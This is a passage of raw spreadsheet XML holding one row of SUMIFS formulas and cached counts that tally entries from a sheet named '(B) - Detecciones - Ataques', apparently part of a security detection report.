        <f>Y31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>7</v>
      </c>
      <c r="Z35" s="353">
        <f>Z31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>8473</v>
      </c>
      <c r="AA35" s="353">
        <f>AA31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>347</v>
      </c>
      <c r="AB35" s="353">
        <f>AB31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>23</v>
      </c>
      <c r="AC35" s="353">
        <f>AC31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>10</v>
      </c>
      <c r="AD35" s="353">
        <f>AD31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>1005</v>
      </c>
      <c r="AE35" s="353">
        <f>AE31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>24</v>
      </c>
      <c r="AF35" s="354">
        <f>AF31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>462</v>
      </c>
      <c r="AG35" s="271"/>
      <c r="AH35" s="352" t="s">
        <v>2476</v>
      </c>
      <c r="AI35" s="355">
        <f>AI31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2060</v>
      </c>
      <c r="AJ35" s="355">
        <f>AJ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AK35" s="355">
        <f>AK31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>4</v>
      </c>
      <c r="AL35" s="355">
        <f>AL31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AM35" s="355">
        <f>AM31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AN35" s="355">
        <f>AN31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AO35" s="355">
        <f>AO31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AP35" s="355">
        <f>AP31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AQ35" s="355">
        <f>AQ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>117</v>
      </c>
      <c r="AR35" s="355">
        <f>AR31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>4</v>
      </c>
      <c r="AS35" s="355">
        <f>AS31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AT35" s="355">
        <f>AT31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AU35" s="355">
        <f>AU31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="AV35" s="355">
        <f>AV31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="AW35" s="355">
        <f>AW31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AX35" s="355">
        <f>AX31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>16</v>
      </c>
      <c r="AY35" s="355">
        <f>AY31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AZ35" s="355">
        <f>AZ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BA35" s="355">
        <f>BA31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BB35" s="355">
        <f>BB31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BC35" s="355">
        <f>BC31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BD35" s="355">
        <f>BD31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BE35" s="355">
        <f>BE31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BF35" s="355">
        <f>BF31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>6</v>
      </c>
      <c r="BG35" s="355">
        <f>BG31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BH35" s="355">
        <f>BH31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BI35" s="355">
        <f>BI31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BJ35" s="355">
        <f>BJ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BK35" s="355">
        <f>BK31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BL35" s="355">
        <f>BL31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BM35" s="355">
        <f>BM31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3292</v>
      </c>
      <c r="BN35" s="355">
        <f>BN31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5180</v>
      </c>
      <c r="BO35" s="355">
        <f>BO31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BP35" s="355">
        <f>BP31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BQ35" s="355">
        <f>BQ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>204</v>
      </c>
      <c r="BR35" s="355">
        <f>BR31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BS35" s="355">
        <f>BS31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BT35" s="355">
        <f>BT31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BU35" s="355">
        <f>BU31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BV35" s="355">
        <f>BV31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BW35" s="355">
        <f>BW31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BX35" s="355">
        <f>BX31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BY35" s="355">
        <f>BY31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>9</v>
      </c>
      <c r="BZ35" s="355">
        <f>BZ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>123</v>
      </c>
      <c r="CA35" s="355">
        <f>CA31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CB35" s="355">
        <f>CB31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CC35" s="355">
        <f>CC31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CD35" s="355">
        <f>CD31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CE35" s="355">
        <f>CE31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CF35" s="355">
        <f>CF31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CG35" s="355">
        <f>CG31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CH35" s="355">
        <f>CH31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CI35" s="355">
        <f>CI31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CJ35" s="355">
        <f>CJ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CK35" s="355">
        <f>CK31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CL35" s="355">
        <f>CL31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CM35" s="355">
        <f>CM31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CN35" s="355">
        <f>CN31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CO35" s="355">
        <f>CO31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>6</v>
      </c>
      <c r="CP35" s="355">
        <f>CP31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CQ35" s="355">
        <f>CQ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CR35" s="355">
        <f>CR31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CS35" s="355">
        <f>CS31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CT35" s="355">
        <f>CT31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1002</v>
      </c>
      <c r="CU35" s="355">
        <f>CU31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CV35" s="355">
        <f>CV31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CW35" s="355">
        <f>CW31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CX35" s="355">
        <f>CX31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CY35" s="355">
        <f>CY31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>17</v>
      </c>
      <c r="CZ35" s="355">
        <f>CZ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DA35" s="355">
        <f>DA31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DB35" s="355">
        <f>DB31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DC35" s="355">
